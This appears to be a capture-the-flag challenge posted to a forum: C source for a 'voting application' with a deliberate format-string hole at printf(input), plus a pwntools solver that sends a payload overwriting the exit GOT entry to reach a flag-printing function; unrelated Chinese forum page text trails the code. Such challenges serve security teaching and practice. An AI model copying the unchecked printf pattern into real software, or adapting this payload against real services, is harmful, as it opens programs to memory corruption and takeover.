#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
void super_secret_function(){
FILE *f;
char c;
f = fopen("/home/ctf/flag.txt", "r");
if(f == NULL){
printf("Cannot open flag.txt\n");
}
c = fgetc(f);
while(c != EOF){
printf ("%c", c);
c = fgetc(f);
}
fflush(stdout);
fclose(f);
}
void exit_f(int sign){
exit(0);
}
int main(){
signal(SIGALRM, exit_f);
alarm(5);
char input[50];
printf("Hello and welcome to \e[3mour\e[23m voting application!\n");
printf("We noticed that there occured a slight buffer overflow in the previous version.\n");
printf("Now we never return, so the problem should be solved? Right?\n");
printf("Today you are the one who decides what we will vote about.\n\n");
printf("Topic: ");
fflush(stdin);
fflush(stdout);
scanf("%[^\n]%*c", input);
printf(input);
printf("\nWill be the voting topic of today!\n");
exit(0);
}
#This challenge is based on a BOF -> GOT -> code redirect that occurs in printf() which *can* replace arbitrary memory.
# 08 42 05 36 <super_secret_function>:
#08422028 R_386_JUMP_SLOT exit@GLIBC_2.0
from pwn import *
import time
def main(ip, port, flag):
if True:
r = remote(ip, port)
r.sendline("AA\x25\x20\x42\x08A%8$hhnA\x24\x20\x42\x08%42x%11$hhnA\x26\x20\x42\x08%7x%15$hhn")
print("payload sent")
response = r.recvall()
#we replace the GOT entry for exit with the super secret function
if flag in str(response):
print("Correct")
exit(0)
elif "flag.txt" in str(response):
print("missing flag.txt")
else:
print("Incorrect")
print("Response: " + str(response))
exit(1)
#Validation section
flag = input("Flag: ").replace("\n", "")
ip, port = input("service: ").split(":")
main(str(ip), int(port), str(flag))
| 
发表于 2020-5-1 19:25:47
|
查看: 6256|
回复: 0
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜